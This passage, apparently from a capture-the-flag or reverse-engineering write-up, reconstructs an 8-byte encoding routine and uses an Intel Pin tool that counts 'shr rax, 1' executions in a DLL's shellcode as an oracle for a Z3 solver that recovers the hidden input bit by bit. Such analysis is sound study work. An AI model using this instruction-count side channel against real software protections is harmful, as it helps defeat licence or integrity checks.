    if args.base_rcx:
        base_rcx = int(args.base_rcx, 16)
    else:
        base_candidates = []
        for p in range(8):
            x = raw_rcx[p][base_byte]
            if x is not None:
                base_candidates.append(x)
        if not base_candidates:
            raise RuntimeError(
                f"no baseline sample for base byte 0x{base_byte:02X} in {in_path}; "
                "pass --base-rcx"
            )
        base_rcx = Counter(base_candidates).most_common(1)[0][0]
    base_state = [base_byte] * 8
    K0 = keff_from_state_rcx(base_state, base_rcx)

    # ---- per-position deltas ----------------------------------------------
    U: List[List[Optional[List[int]]]] = [[None] * 256 for _ in range(8)]
    for i in range(8):
        U[i][base_byte] = [0] * 8
        for v in range(256):
            y = raw_rcx[i][v]
            if y is None:
                continue
            s = [base_byte] * 8
            s[i] = v
            ke = keff_from_state_rcx(s, y)
            U[i][v] = xor8(ke, K0)

    coverage = {}
    for i in range(8):
        cnt_1_ff = sum(1 for v in range(1, 256) if raw_rcx[i][v] is not None)
        cnt_all = sum(1 for v in range(256) if raw_rcx[i][v] is not None)
        coverage[i] = {"count_01_ff": cnt_1_ff, "count_00_ff": cnt_all}

    # ---- self-check against every usable row ------------------------------
    total_eval, mismatch = 0, 0
    mismatch_examples = []
    for r in rows:
        st = r["state"]
        y_obs = r["rcx"]
        y_pred = predict_y(st, K0, U)
        if y_pred is None:
            continue
        total_eval += 1
        if y_pred != y_obs:
            mismatch += 1
            if len(mismatch_examples) < 20:
                mismatch_examples.append({
                    "state_hex": r["state_hex"],
                    "obs": fmt64(y_obs),
                    "pred": fmt64(y_pred),
                    "residual": fmt64(y_obs ^ y_pred),
                    "line": r["line"]
                })

    # ---- emit the model ---------------------------------------------------
    py_path = Path(f"{args.out_prefix}_arrays.py")
    with py_path.open("w", encoding="utf-8") as f:
        f.write("# Auto-generated\n")
        f.write(f"BASE_BYTE = 0x{base_byte:02X}\n")
        f.write(f"BASE_RCX = {fmt64(base_rcx)}\n")
        f.write(f"K0 = {K0!r}\n")
        f.write("U = [\n")
        for i in range(8):
            f.write(" [\n")
            for v in range(256):
                f.write(f" {U[i][v]!r},\n")
            f.write(" ],\n")
        f.write("]\n")

    print(f" base_rcx = {fmt64(base_rcx)}")
    print(f" K0 = {fmt64(pack_le(K0))}")
    for i in range(8):
        c1 = coverage[i]['count_01_ff']
        c2 = coverage[i]['count_00_ff']
        print(f" pos{i}: 01..FF={c1}/255, 00..FF={c2}/256")
    print(f" check: eval={total_eval}, mismatch={mismatch}")
    # Surface data-quality problems that would otherwise go unnoticed.
    if skipped:
        print(f" skipped unusable lines: {skipped}")
    if conflicts:
        print(f" conflicting samples (majority used): {len(conflicts)}")

if __name__ == "__main__":
main()

The algorithm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
def A(x):
    """x shifted left by 4, truncated to 8 bits."""
    shifted = x << 4
    return shifted & 0xFF


def B(x):
    """x XOR (x shifted right by 4)."""
    high = x >> 4
    return x ^ high


def C(x):
    """x XOR (x shifted left by 2, truncated to 8 bits)."""
    shifted = (x << 2) & 0xFF
    return x ^ shifted


def D(x):
    """x shifted left by 1, truncated to 8 bits."""
    shifted = x << 1
    return shifted & 0xFF


def E(x):
    """x XOR (x shifted left by 4, truncated to 8 bits)."""
    shifted = (x << 4) & 0xFF
    return x ^ shifted
def T(x):
    """Range-dependent correction term for an 8-byte state.

    For each input byte x[i]:
      * if x[i] < 0x80, output (i + 4) & 7 is XORed with 1;
      * output lo_idx[i] is XORed with 2 if x[i] < 0x40, with 3 if
        0x40 <= x[i] < 0x80, with 1 if x[i] >= 0xC0, and left alone otherwise.
    Returns the eight accumulated output bytes.
    """
    lo_idx = (3, 0, 1, 2, 7, 4, 5, 6)
    acc = [0] * 8
    for i in range(8):
        b = x[i]
        if b < 0x40:
            low_term = 2
        elif b < 0x80:
            low_term = 3
        elif b >= 0xC0:
            low_term = 1
        else:
            low_term = 0
        # (i + 4) & 7 never equals lo_idx[i], so the two contributions of
        # one input byte always land on different outputs.
        if b < 0x80:
            acc[(i + 4) & 7] ^= 1
        acc[lo_idx[i]] ^= low_term
    return acc

def L(state):
    """Apply the byte-wise mixing layer to an 8-byte state.

    Each output byte is the XOR of four transformed input bytes; row k of
    the table below lists the (transform, input index) pairs for output k.
    """
    rows = (
        ((A, 0), (C, 2), (B, 3), (D, 5)),
        ((B, 0), (A, 1), (C, 3), (D, 6)),
        ((C, 0), (B, 1), (A, 2), (D, 7)),
        ((C, 1), (B, 2), (A, 3), (D, 4)),
        ((D, 1), (E, 4), (C, 6), (B, 7)),
        ((D, 2), (B, 4), (E, 5), (C, 7)),
        ((D, 3), (C, 4), (B, 5), (E, 6)),
        ((D, 0), (C, 5), (B, 6), (E, 7)),
    )
    mixed = []
    for terms in rows:
        acc = 0
        for transform, idx in terms:
            acc ^= transform(state[idx])
        mixed.append(acc & 0xFF)
    return mixed

def ENC(state_bytes):
    """Encode an 8-byte state: out[i] = L(state)[i] XOR K0[i] XOR T(state)[i]."""
    K0 = (180, 83, 16, 61, 75, 204, 8, 85)
    state = [b & 0xFF for b in state_bytes]
    lin = L(state)
    corr = T(state)
    return [(l ^ k ^ t) & 0xFF for l, k, t in zip(lin, K0, corr)]

def pack_le(bs):
    """Combine bytes (least-significant first) into one integer; each item is masked to 8 bits."""
    # The byte lanes never overlap, so adding them equals OR-ing them.
    return sum((b & 0xFF) << (8 * i) for i, b in enumerate(bs))

if __name__ == "__main__":
    import sys

    # The 8-byte state is given as 16 hex digits on the command line. An
    # empty state would only make ENC fail with an IndexError, so reject
    # anything that is not exactly eight bytes with a usage message instead.
    state_hex = sys.argv[1] if len(sys.argv) > 1 else ""
    state = bytearray.fromhex(state_hex)
    if len(state) != 8:
        raise SystemExit("usage: provide the 8-byte state as 16 hex digits")
    out = ENC(state)
    res = pack_le(out)
    print("inp =", state.hex())
    print(f"res = 0x{res:016X}")

Pin tool that counts how many times `shr rax, 1` executes inside the shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cctype>

// -o: file that Fini writes the final count to.
KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "shr_num.txt", "output count file");
// -call_rva: offset of the `call rsi` instruction from the load address of Doll.dll.
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll");

// Absolute address of the call site; stays 0 until ImageLoad sees doll.dll.
static ADDRINT g_callsite = 0;
// Guards g_total_shr_rax1 while thread counters are merged in ThreadFini.
static PIN_LOCK g_lock;
// Sum of the per-thread shr counters, accumulated as threads exit.
static UINT64 g_total_shr_rax1 = 0;
// Per-thread state; one instance is stored in the g_tls slot of every thread.
struct TData {
    // Set by EnterShellcode and cleared by ExitShellcode.
    bool in_sc = false;

    // Half-open address window [sc_lo, sc_hi) inside which shr is counted.
    ADDRINT sc_lo = 0;
    ADDRINT sc_hi = 0;

    // Return value (VA_After) and dwSize argument (VA_Before) of the most
    // recent VirtualAlloc call observed on this thread.
    ADDRINT last_va_base = 0;
    ADDRINT last_va_size = 0;

    // Number of matching shr instructions executed by this thread.
    UINT64 shr_cnt = 0;
};

// TLS key under which each thread's TData pointer is stored (created in main).
static TLS_KEY g_tls;

// Returns a copy of `s` with every character passed through std::tolower.
static inline std::string ToLower(std::string s) {
    for (char& ch : s) {
        // Go through unsigned char so negative char values are not handed
        // to std::tolower.
        const unsigned char raw = (unsigned char)ch;
        ch = (char)std::tolower(raw);
    }
    return s;
}

// Fetches the TData pointer stored in thread `tid`'s g_tls slot.
static TData* GetTD(THREADID tid) {
    VOID* slot = PIN_GetThreadData(g_tls, tid);
    return reinterpret_cast<TData*>(slot);
}

// Thread-start callback: allocates a fresh TData and stores it in the
// thread's g_tls slot.
static VOID ThreadStart(THREADID tid, CONTEXT* /*ctxt*/, INT32 /*flags*/, VOID* /*v*/) {
    PIN_SetThreadData(g_tls, new TData(), tid);
}

// Thread-exit callback: folds the thread's shr counter into the global total
// (under g_lock) and frees its TData.
static VOID ThreadFini(THREADID tid, const CONTEXT* /*ctxt*/, INT32 /*code*/, VOID* /*v*/) {
    TData* state = GetTD(tid);
    if (state == nullptr) {
        return;
    }

    PIN_GetLock(&g_lock, 1);
    g_total_shr_rax1 += state->shr_cnt;
    PIN_ReleaseLock(&g_lock);

    delete state;
}

// Runs before VirtualAlloc: remembers the requested size (second argument)
// for the calling thread. The other arguments are ignored.
static VOID VA_Before(THREADID tid, ADDRINT /*lpAddress*/, ADDRINT dwSize, ADDRINT /*flAllocationType*/, ADDRINT /*flProtect*/) {
    if (TData* state = GetTD(tid)) {
        state->last_va_size = dwSize;
    }
}

// Runs after VirtualAlloc returns: remembers the returned base address for
// the calling thread.
static VOID VA_After(THREADID tid, ADDRINT ret) {
    if (TData* state = GetTD(tid)) {
        state->last_va_base = ret;
    }
}

// Called right before the instrumented call site executes. Marks the thread
// as inside the shellcode and defines the address window to count in.
//   shell_entry - value of RSI at the call site (the call target).
// The third argument (instruction pointer) is unused.
static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry, ADDRINT /*ip*/) {
    TData* state = GetTD(tid);
    if (state == nullptr) {
        return;
    }
    state->in_sc = true;

    // When the target is exactly the base of the last VirtualAlloc on this
    // thread, use that allocation's size; otherwise fall back to a fixed
    // 0x200000-byte window starting at the entry point.
    const bool from_last_alloc =
        (state->last_va_base == shell_entry) && (state->last_va_size > 0);
    const ADDRINT span = from_last_alloc ? state->last_va_size : (ADDRINT)0x200000;

    state->sc_lo = shell_entry;
    state->sc_hi = shell_entry + span;
}

// Marks the thread as no longer inside the shellcode.
static VOID ExitShellcode(THREADID tid) {
    if (TData* state = GetTD(tid)) {
        state->in_sc = false;
    }
}

// "If" predicate for the shr counter: returns 1 only when the thread is
// inside the shellcode and `ip` lies in its [sc_lo, sc_hi) window.
static ADDRINT ShouldCount(THREADID tid, ADDRINT ip) {
    const TData* state = GetTD(tid);
    const bool inside = state != nullptr
                        && state->in_sc
                        && ip >= state->sc_lo
                        && ip < state->sc_hi;
    return inside ? 1 : 0;
}

// "Then" routine of the shr counter: bumps the calling thread's counter.
static VOID IncShrCount(THREADID tid) {
    if (TData* state = GetTD(tid)) {
        state->shr_cnt++;
    }
}

// Returns true when `ins` is an SHR whose first operand is the RAX register
// and whose second operand, if there is one, is an immediate whose low byte
// equals 1. An SHR on RAX with no second operand also matches.
static bool IsShrRax1(INS ins) {
    const bool shr_on_rax = INS_Opcode(ins) == XED_ICLASS_SHR
                            && INS_OperandCount(ins) >= 1
                            && INS_OperandIsReg(ins, 0)
                            && INS_OperandReg(ins, 0) == REG_RAX;
    if (!shr_on_rax) {
        return false;
    }
    if (INS_OperandCount(ins) < 2) {
        return true;
    }
    // A second operand that is not an immediate (e.g. a register count)
    // disqualifies the instruction.
    if (!INS_OperandIsImmediate(ins, 1)) {
        return false;
    }
    const ADDRINT count = INS_OperandImmediate(ins, 1);
    return (count & 0xFF) == 1;
}

// Image-load callback. Hooks VirtualAlloc in any image that exports it, and
// computes the absolute call-site address once an image whose name contains
// "doll.dll" (case-insensitive) is loaded.
static VOID ImageLoad(IMG img, VOID* /*v*/) {
    const std::string lowered = ToLower(IMG_Name(img));

    RTN alloc_rtn = RTN_FindByName(img, "VirtualAlloc");
    if (RTN_Valid(alloc_rtn)) {
        RTN_Open(alloc_rtn);
        // Entry probe: forwards the first four arguments to VA_Before.
        RTN_InsertCall(alloc_rtn, IPOINT_BEFORE, (AFUNPTR)VA_Before,
                       IARG_THREAD_ID,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 1,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 2,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 3,
                       IARG_END);
        // Exit probe: forwards the return value to VA_After.
        RTN_InsertCall(alloc_rtn, IPOINT_AFTER, (AFUNPTR)VA_After,
                       IARG_THREAD_ID,
                       IARG_FUNCRET_EXITPOINT_VALUE,
                       IARG_END);
        RTN_Close(alloc_rtn);
    }

    if (lowered.find("doll.dll") == std::string::npos) {
        return;
    }
    // Call site = image load address + RVA from the call_rva knob.
    const ADDRINT image_base = IMG_LowAddress(img);
    const UINT64 call_rva = KnobCallRva.Value();
    g_callsite = image_base + (ADDRINT)call_rva;
}

// Instruction-level instrumentation callback.
// - At the configured call site, EnterShellcode runs before the instruction
//   with RSI (the call target) and the instruction pointer; ExitShellcode is
//   attached after it only when Pin reports IPOINT_AFTER as valid there.
// - Every instruction accepted by IsShrRax1 gets an If/Then pair:
//   IncShrCount runs only when ShouldCount(ip) returns non-zero. The If call
//   must be inserted directly before its Then call.
static VOID Instruction(INS ins, VOID* /*v*/) {
if (g_callsite != 0 && INS_Address(ins) == g_callsite) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RSI,
IARG_INST_PTR,
IARG_END);

// NOTE(review): if IPOINT_AFTER is not valid for this call instruction,
// ExitShellcode is never attached and in_sc stays set — confirm intended.
if (INS_IsValidForIpointAfter(ins)) {
INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)ExitShellcode,
IARG_THREAD_ID,
IARG_END);
}
}
if (IsShrRax1(ins)) {
// Predicate: is this thread currently inside the counted window?
INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldCount,
IARG_THREAD_ID,
IARG_INST_PTR,
IARG_END);

// Action: bump the per-thread counter.
INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)IncShrCount,
IARG_THREAD_ID,
IARG_END);
}
}

// Application-exit callback: writes the accumulated shr count as a decimal
// line to the file named by the -o knob. Does nothing if the file cannot be
// opened.
static VOID Fini(INT32 /*code*/, VOID* /*v*/) {
    FILE* out = std::fopen(KnobOut.Value().c_str(), "wb");
    if (out != nullptr) {
        const unsigned long long total = (unsigned long long)g_total_shr_rax1;
        std::fprintf(out, "%llu\n", total);
        std::fclose(out);
    }
}

// Pin tool entry point: initialises Pin, the TLS key and the lock, registers
// all callbacks and starts the target program. Returns 1 if Pin
// initialisation fails; PIN_StartProgram is the last call made.
int main(int argc, char* argv[]) {
    PIN_InitSymbols();
    if (PIN_Init(argc, argv)) {
        return 1;
    }

    g_tls = PIN_CreateThreadDataKey(nullptr);
    PIN_InitLock(&g_lock);

    IMG_AddInstrumentFunction(ImageLoad, nullptr);
    INS_AddInstrumentFunction(Instruction, nullptr);
    PIN_AddThreadStartFunction(ThreadStart, nullptr);
    PIN_AddThreadFiniFunction(ThreadFini, nullptr);
    PIN_AddFiniFunction(Fini, nullptr);

    PIN_StartProgram();
    return 0;
}

Automated recovery script (Z3 constraints driven by the `shr` count oracle):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
# -*- coding: utf-8 -*-
import argparse
import json
import re
import subprocess
import time
from pathlib import Path
from typing import Dict, Tuple, Optional, List, Any

from z3 import (
BitVec, BitVecVal, Solver, sat, LShR, ULT, UGE, And, If, Or, Extract
)

K0 = [180, 83, 16, 61, 75, 204, 8, 85]
LO_IDX = [3, 0, 1, 2, 7, 4, 5, 6]

N_QWORDS = 4
BYTES_PER_Q = 8
TOTAL_BYTES = N_QWORDS * BYTES_PER_Q
TOTAL_BITS = TOTAL_BYTES * 8

def bv8(x: int):
    """8-bit Z3 constant holding the low byte of `x`."""
    return BitVecVal(x & 0xFF, 8)


def A_z(x):
    """Z3 form of A: x << 4, masked to 8 bits."""
    shifted = x << 4
    return shifted & bv8(0xFF)


def B_z(x):
    """Z3 form of B: x XOR (x logically shifted right by 4)."""
    return x ^ LShR(x, 4)


def C_z(x):
    """Z3 form of C: x XOR ((x << 2) masked to 8 bits)."""
    shifted = (x << 2) & bv8(0xFF)
    return x ^ shifted


def D_z(x):
    """Z3 form of D: x << 1, masked to 8 bits."""
    shifted = x << 1
    return shifted & bv8(0xFF)


def E_z(x):
    """Z3 form of E: x XOR ((x << 4) masked to 8 bits)."""
    shifted = (x << 4) & bv8(0xFF)
    return x ^ shifted

def T_z(state8):
    """Z3 form of the range-dependent correction term for eight state bytes.

    For each input byte x at position i (unsigned comparisons):
      * output (i + 4) & 7 is XORed with 1 when x < 0x80, else with 0;
      * output LO_IDX[i] is XORed with 2 when x < 0x40, 3 when
        0x40 <= x < 0x80, 1 when x >= 0xC0, and 0 otherwise.
    Returns the list of eight accumulated 8-bit expressions.
    """
    acc = [bv8(0) for _ in range(8)]
    for i in range(8):
        x = state8[i]
        below_80 = ULT(x, bv8(0x80))
        below_40 = ULT(x, bv8(0x40))
        mid_band = And(UGE(x, bv8(0x40)), ULT(x, bv8(0x80)))
        top_band = UGE(x, bv8(0xC0))

        hi_slot = (i + 4) & 7
        acc[hi_slot] = acc[hi_slot] ^ If(below_80, bv8(1), bv8(0))

        low_term = If(below_40, bv8(2), If(mid_band, bv8(3), If(top_band, bv8(1), bv8(0))))
        lo_slot = LO_IDX[i]
        acc[lo_slot] = acc[lo_slot] ^ low_term
    return acc

def L_z(s):
    """Z3 form of the mixing layer: each output is the XOR of four transformed inputs.

    Row k of the table lists the (transform, input index) pairs for output k,
    in the order they are XORed together.
    """
    rows = (
        ((A_z, 0), (C_z, 2), (B_z, 3), (D_z, 5)),
        ((B_z, 0), (A_z, 1), (C_z, 3), (D_z, 6)),
        ((C_z, 0), (B_z, 1), (A_z, 2), (D_z, 7)),
        ((C_z, 1), (B_z, 2), (A_z, 3), (D_z, 4)),
        ((D_z, 1), (E_z, 4), (C_z, 6), (B_z, 7)),
        ((D_z, 2), (B_z, 4), (E_z, 5), (C_z, 7)),
        ((D_z, 3), (C_z, 4), (B_z, 5), (E_z, 6)),
        ((D_z, 0), (C_z, 5), (B_z, 6), (E_z, 7)),
    )
    out = []
    for terms in rows:
        # Seed with the first term so no extra constant enters the expression.
        first_fn, first_idx = terms[0]
        acc = first_fn(s[first_idx])
        for transform, idx in terms[1:]:
            acc = acc ^ transform(s[idx])
        out.append(acc & bv8(0xFF))
    return out

def ENC8_z(state8):
    """Z3 form of the block encoding: out[i] = L_z[i] XOR K0[i] XOR T_z[i], masked to 8 bits."""
    lin = L_z(state8)
    corr = T_z(state8)
    return [(l ^ bv8(k) ^ t) & bv8(0xFF) for l, k, t in zip(lin, K0, corr)]

def build_solver(
        fixed_bits: Dict[Tuple[int, int], int],
        forbid_zero_input: bool,
        printable_only: bool = True,
        printable_min: int = 0x20,
        printable_max: int = 0x7E,
        allowed_charset: Optional[bytes] = None):
    """Build a Z3 solver over the TOTAL_BYTES input bytes.

    Parameters:
        fixed_bits: maps (qword index, bit index 0..63) to the required value
            (0 or 1) of that bit of the encoded output.
        forbid_zero_input: when true, no input byte may be 0.
        printable_only / printable_min / printable_max: when no charset is
            given and printable_only is true, every input byte is constrained
            to the inclusive range [printable_min, printable_max].
        allowed_charset: when given, every input byte must be one of these
            bytes; this takes precedence over the printable range.

    Returns (solver, input byte variables, encoded blocks), where the encoded
    blocks are one list of eight 8-bit expressions per qword.

    Raises ValueError for an empty `allowed_charset` or an out-of-range key
    in `fixed_bits`.
    """
    s = Solver()
    x = [BitVec(f"x{i}", 8) for i in range(TOTAL_BYTES)]
    if forbid_zero_input:
        for xi in x:
            s.add(xi != bv8(0))
    if allowed_charset is not None:
        cs = sorted(set(int(c) & 0xFF for c in allowed_charset))
        if not cs:
            raise ValueError("allowed_charset cannot be empty")
        choices = [bv8(c) for c in cs]
        for xi in x:
            s.add(Or(*[xi == c for c in choices]))
    elif printable_only:
        lo = printable_min & 0xFF
        hi = printable_max & 0xFF
        for xi in x:
            s.add(UGE(xi, bv8(lo)))
            # Inclusive upper bound written as hi >= xi. The former
            # "xi < hi + 1" wrapped to "xi < 0" for hi == 0xFF, which made
            # the whole problem unsatisfiable.
            s.add(UGE(bv8(hi), xi))
    y_blocks = []
    for q in range(N_QWORDS):
        st = x[q * 8:(q + 1) * 8]
        y_blocks.append(ENC8_z(st))
    for (q, bit), v in fixed_bits.items():
        if not (0 <= q < N_QWORDS and 0 <= bit < 64):
            raise ValueError(f"invalid key {(q, bit)}")
        # Bit `bit` of qword q lives in byte bit // 8 at position bit % 8.
        byte_i = bit // 8
        bit_i = bit % 8
        b = Extract(bit_i, bit_i, y_blocks[q][byte_i])
        s.add(b == BitVecVal(int(v), 1))
    return s, x, y_blocks

def model_eval_u8(m, exprs) -> bytes:
    """Evaluate each expression in model `m` (with model completion) and return the low bytes."""
    return bytes(
        int(m.eval(expr, model_completion=True).as_long()) & 0xFF
        for expr in exprs
    )

def solve_one_input(fixed_bits: Dict[Tuple[int, int], int], forbid_zero_input: bool = True, printable_only: bool = True, printable_min: int = 0x20, printable_max: int = 0x7E, allowed_charset: Optional[bytes] = None) -> Optional[Tuple[bytes, bytes]]:
    """Find one input satisfying the constraints.

    Returns (input bytes, encoded bytes) taken from a satisfying model, or
    None when the constraints are not satisfiable. The arguments are passed
    straight to build_solver.
    """
    solver, in_vars, blocks = build_solver(
        fixed_bits,
        forbid_zero_input=forbid_zero_input,
        printable_only=printable_only,
        printable_min=printable_min,
        printable_max=printable_max,
        allowed_charset=allowed_charset,
    )
    if solver.check() != sat:
        return None

    model = solver.model()
    plain = model_eval_u8(model, in_vars)
    encoded = bytearray()
    for q in range(N_QWORDS):
        encoded += model_eval_u8(model, blocks[q])
    return bytes(plain), bytes(encoded)

def qword_plain_uniqueness(fixed_bits: Dict[Tuple[int, int], int], q: int, forbid_zero_input: bool = True, printable_only: bool = True, printable_min: int = 0x20, printable_max: int = 0x7E, allowed_charset: Optional[bytes] = None):
    """Check whether the constraints pin down the eight input bytes of qword `q`.

    Returns a triple (unique, first_hex, second_hex):
      * (False, None, None) when the constraints are unsatisfiable;
      * (True, first_hex, None) when exactly one assignment of qword `q` exists;
      * (False, first_hex, second_hex) when a second, different assignment exists.
    """
    solver, in_vars, _ = build_solver(
        fixed_bits,
        forbid_zero_input=forbid_zero_input,
        printable_only=printable_only,
        printable_min=printable_min,
        printable_max=printable_max,
        allowed_charset=allowed_charset,
    )
    if solver.check() != sat:
        return False, None, None

    base = q * 8
    q_vars = [in_vars[base + i] for i in range(8)]

    def snapshot(model):
        # Concrete byte values of qword q under `model`.
        return [int(model.eval(v, model_completion=True).as_long()) & 0xFF for v in q_vars]

    first = snapshot(solver.model())
    first_hex = bytes(first).hex()

    # Exclude the first assignment and ask for any other one.
    solver.add(Or(*[(var != bv8(byte)) for var, byte in zip(q_vars, first)]))
    if solver.check() != sat:
        return True, first_hex, None
    second = snapshot(solver.model())
    return False, first_hex, bytes(second).hex()

class ShrOracle:
    """Runs the Pin tool on a candidate input and reads back the count it writes.

    Attributes mirror the constructor arguments: `workdir` is the directory
    holding the input and count files, `pin_cmd` the command line to run,
    `input_file` / `shr_file` the file names inside `workdir`.
    """

    def __init__(
            self,
            workdir: Path,
            pin_cmd: List[str],
            input_file: str,
            shr_file: str,
            timeout_sec: float = 15.0,
            retries: int = 2,
            samples: int = 1):
        self.workdir = Path(workdir)
        self.pin_cmd = pin_cmd
        self.input_file = input_file
        self.shr_file = shr_file
        self.timeout_sec = timeout_sec
        self.retries = retries
        # At least one sample is always taken.
        self.samples = max(1, int(samples))

    @staticmethod
    def parse_int(text: str) -> Optional[int]:
        """Return the first (optionally negative) decimal integer in `text`, or None."""
        found = re.search(r"-?\d+", text)
        return int(found.group(0)) if found else None

    def run_once(self, inp32: bytes) -> int:
        """Write `inp32`, run the command once and return the count from the count file.

        The command itself runs without a time limit; afterwards the count
        file is polled for up to `timeout_sec` seconds. Raises RuntimeError
        if no integer could be read in that time.
        """
        input_path = self.workdir / self.input_file
        count_path = self.workdir / self.shr_file
        input_path.write_bytes(inp32)
        # Remove any stale result so an old count cannot be mistaken for a new one.
        if count_path.exists():
            count_path.unlink()
        subprocess.run(
            self.pin_cmd,
            cwd=str(self.workdir),
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            check=False,
        )
        started = time.time()
        while time.time() - started < self.timeout_sec:
            if count_path.exists():
                content = count_path.read_text(encoding="utf-8", errors="ignore").strip()
                if content:
                    value = self.parse_int(content)
                    if value is not None:
                        return value
            time.sleep(0.03)
        raise RuntimeError(f"Read shr file timeout")

    def query(self, inp32: bytes) -> int:
        """Return the largest count seen over `samples` measurements of `inp32`.

        Each measurement is attempted up to `retries + 1` times. Raises
        RuntimeError (carrying the last error) if no measurement succeeded.
        """
        best = None
        last_err = None
        for _sample in range(self.samples):
            for _attempt in range(self.retries + 1):
                try:
                    value = self.run_once(inp32)
                    best = value if best is None else max(best, value)
                except Exception as exc:
                    last_err = exc
                    continue
                break
        if best is None:
            raise RuntimeError(f"oracle failed: {last_err}")
        return best

def gbit_to_qb(g: int) -> Tuple[int, int]:
    """Split a global bit index into (qword index, bit index within the qword)."""
    return divmod(g, 64)


def qb_to_gbit(q: int, b: int) -> int:
    """Combine a qword index and a bit index within it into a global bit index."""
    return 64 * q + b


def enc_bit(enc32: bytes, g: int) -> int:
    """Return global bit `g` of `enc32`, where bit 0 is the least-significant bit of byte 0."""
    byte_i, bit_i = divmod(g, 8)
    return (enc32[byte_i] >> bit_i) & 1

def fixed_to_global_map(fixed_bits: Dict[Tuple[int, int], int]) -> Dict[int, int]:
    """Re-key `fixed_bits` from (qword, bit) pairs to global bit indices."""
    return {qb_to_gbit(q, b): int(v) for (q, b), v in fixed_bits.items()}

def fixed_cipher_hex32(fixed_bits: Dict[Tuple[int, int], int]) -> str:
    """Hex dump of TOTAL_BYTES bytes with every bit fixed to 1 set and all other bits 0."""
    buf = bytearray(TOTAL_BYTES)
    for (q, bit), v in fixed_bits.items():
        if int(v) != 1:
            continue
        byte_off, bit_off = divmod(bit, 8)
        buf[q * 8 + byte_off] |= (1 << bit_off)
    return buf.hex()

def clear_qword_bits(fixed_bits: Dict[Tuple[int, int], int], q: int):
    """Remove every entry (q, 0..63) from `fixed_bits` in place; missing keys are ignored."""
    for key in ((q, b) for b in range(64)):
        fixed_bits.pop(key, None)

def clear_from_qword(fixed_bits: Dict[Tuple[int, int], int], q: int):
    """Remove, in place, all fixed bits of qword `q` and of every later qword."""
    for later_q in range(q, N_QWORDS):
        clear_qword_bits(fixed_bits, later_q)

def absorb_by_score(fixed_bits: Dict[Tuple[int, int], int], enc32: bytes, score: int):
    """Record the first `score` bits of `enc32` in `fixed_bits` (in place).

    `score` is clamped to the range 0..TOTAL_BITS. Bits are visited in
    global order; a bit that is not yet fixed is stored, and processing stops
    at the first bit whose stored value disagrees with `enc32`.

    Returns (newly, conflict): `newly` lists the (q, bit, value) triples
    added by this call, `conflict` is None or a dict describing the
    disagreeing bit ("gbit", "q", "bit", "old", "new").
    """
    limit = int(score)
    if limit < 0:
        limit = 0
